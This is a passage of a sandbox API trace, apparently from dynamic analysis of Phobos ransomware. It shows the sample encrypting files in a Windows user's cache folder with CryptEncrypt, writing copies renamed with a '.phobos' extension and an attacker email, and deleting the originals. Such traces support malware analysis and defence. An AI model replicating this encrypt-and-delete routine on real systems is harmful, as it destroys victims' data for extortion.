nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0198.213] CryptDestroyKey (hKey=0xa328a8) returned 1 [0198.213] CloseHandle (hObject=0x140) returned 1 [0198.213] CloseHandle (hObject=0x15c) returned 1 [0198.213] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d47dbd2f9e3365fbbe008d71fb06716f_4dd1053bcc726da41115fff4c7d6e9cc")) returned 1 [0198.214] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0198.214] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d47dbd2f9e3365fbbe008d71fb06716f_d33192d58aa9ca2b9097e848e9fe86de"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.214] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=408) returned 1 [0198.214] CloseHandle (hObject=0x15c) returned 1 [0198.214] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d47dbd2f9e3365fbbe008d71fb06716f_d33192d58aa9ca2b9097e848e9fe86de")) returned 0x2024 [0198.214] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d47dbd2f9e3365fbbe008d71fb06716f_d33192d58aa9ca2b9097e848e9fe86de.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.214] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d47dbd2f9e3365fbbe008d71fb06716f_d33192d58aa9ca2b9097e848e9fe86de"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.214] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.215] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.215] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d47dbd2f9e3365fbbe008d71fb06716f_d33192d58aa9ca2b9097e848e9fe86de.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.218] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328a8) returned 1 [0198.218] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.218] ReadFile (in: hFile=0x15c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x198, lpOverlapped=0x0) returned 1 [0198.219] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1a0, dwBufLen=0x1a0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1a0) returned 1 [0198.219] WriteFile (in: hFile=0x140, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1a0, lpOverlapped=0x0) returned 1 [0198.220] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32be8) returned 1 [0198.220] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.220] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0198.220] CryptDestroyKey (hKey=0xa32be8) returned 1 [0198.220] WriteFile (in: hFile=0x140, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0198.220] CryptDestroyKey (hKey=0xa328a8) returned 1 [0198.220] CloseHandle (hObject=0x15c) returned 1 [0198.220] CloseHandle (hObject=0x140) returned 1 [0198.220] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d47dbd2f9e3365fbbe008d71fb06716f_d33192d58aa9ca2b9097e848e9fe86de")) returned 1 [0198.221] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0198.221] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d52c56d8f24bec96604372afbaf264e1_e76a2b627dd019eb51d9335f24b14c2c"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.222] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=420) returned 1 [0198.222] CloseHandle (hObject=0x140) returned 1 [0198.222] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d52c56d8f24bec96604372afbaf264e1_e76a2b627dd019eb51d9335f24b14c2c")) returned 0x2024 [0198.222] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d52c56d8f24bec96604372afbaf264e1_e76a2b627dd019eb51d9335f24b14c2c.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.222] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d52c56d8f24bec96604372afbaf264e1_e76a2b627dd019eb51d9335f24b14c2c"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.222] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.223] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.223] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d52c56d8f24bec96604372afbaf264e1_e76a2b627dd019eb51d9335f24b14c2c.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.223] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328a8) returned 1 [0198.223] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.223] ReadFile (in: hFile=0x140, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x1a4, lpOverlapped=0x0) returned 1 [0198.224] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1b0, dwBufLen=0x1b0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1b0) returned 1 [0198.224] WriteFile (in: hFile=0x15c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1b0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1b0, lpOverlapped=0x0) returned 1 [0198.225] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32be8) returned 1 [0198.225] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.225] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0198.225] CryptDestroyKey (hKey=0xa32be8) returned 1 [0198.225] WriteFile (in: hFile=0x15c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0198.225] CryptDestroyKey (hKey=0xa328a8) returned 1 [0198.225] CloseHandle (hObject=0x140) returned 1 [0198.225] CloseHandle (hObject=0x15c) returned 1 [0198.226] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d52c56d8f24bec96604372afbaf264e1_e76a2b627dd019eb51d9335f24b14c2c")) returned 1 [0198.226] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0198.226] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\ea618097e393409afa316f0f87e2c202_827c1b837652b048c4c84237d0838585"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.227] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=398) returned 1 [0198.227] CloseHandle (hObject=0x15c) returned 1 [0198.227] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\ea618097e393409afa316f0f87e2c202_827c1b837652b048c4c84237d0838585")) returned 0x2024 [0198.227] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\ea618097e393409afa316f0f87e2c202_827c1b837652b048c4c84237d0838585.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.227] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\ea618097e393409afa316f0f87e2c202_827c1b837652b048c4c84237d0838585"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.227] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.227] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.227] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\ea618097e393409afa316f0f87e2c202_827c1b837652b048c4c84237d0838585.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.228] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328a8) returned 1 [0198.228] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.228] ReadFile (in: hFile=0x15c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x18e, lpOverlapped=0x0) returned 1 [0198.228] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x190, dwBufLen=0x190 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x190) returned 1 [0198.229] WriteFile (in: hFile=0x140, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x190, lpOverlapped=0x0) returned 1 [0198.229] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32be8) returned 1 [0198.229] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.229] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0198.229] CryptDestroyKey (hKey=0xa32be8) returned 1 [0198.229] WriteFile (in: hFile=0x140, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0198.230] CryptDestroyKey (hKey=0xa328a8) returned 1 [0198.230] CloseHandle (hObject=0x15c) returned 1 [0198.230] CloseHandle (hObject=0x140) returned 1 [0198.230] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\ea618097e393409afa316f0f87e2c202_827c1b837652b048c4c84237d0838585")) returned 1 [0198.230] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0198.231] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\f293aead5e84facfb686c4a620718928_c8424a0b24a72939b13720d0c000c9c1"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.231] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=416) returned 1 [0198.231] CloseHandle (hObject=0x140) returned 1 [0198.231] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\f293aead5e84facfb686c4a620718928_c8424a0b24a72939b13720d0c000c9c1")) returned 0x2024 [0198.231] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\f293aead5e84facfb686c4a620718928_c8424a0b24a72939b13720d0c000c9c1.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.231] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\f293aead5e84facfb686c4a620718928_c8424a0b24a72939b13720d0c000c9c1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.231] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.231] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.231] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\f293aead5e84facfb686c4a620718928_c8424a0b24a72939b13720d0c000c9c1.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.232] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328a8) returned 1 [0198.232] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.232] ReadFile (in: hFile=0x140, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x1a0, lpOverlapped=0x0) returned 1 [0198.233] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1b0, dwBufLen=0x1b0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1b0) returned 1 [0198.233] WriteFile (in: hFile=0x15c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1b0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1b0, lpOverlapped=0x0) returned 1 [0198.238] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32be8) returned 1 [0198.238] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.239] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0198.239] CryptDestroyKey (hKey=0xa32be8) returned 1 [0198.239] WriteFile (in: hFile=0x15c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0198.239] CryptDestroyKey (hKey=0xa328a8) returned 1 [0198.239] CloseHandle (hObject=0x140) returned 1 [0198.239] CloseHandle (hObject=0x15c) returned 1 [0198.239] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\f293aead5e84facfb686c4a620718928_c8424a0b24a72939b13720d0c000c9c1")) returned 1 [0198.240] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0198.240] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\f90f18257cbb4d84216ac1e1f3bb2c76"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.241] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=252) returned 1 [0198.241] CloseHandle (hObject=0x15c) returned 1 [0198.241] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\f90f18257cbb4d84216ac1e1f3bb2c76")) returned 0x2024 [0198.241] GetFileAttributesW 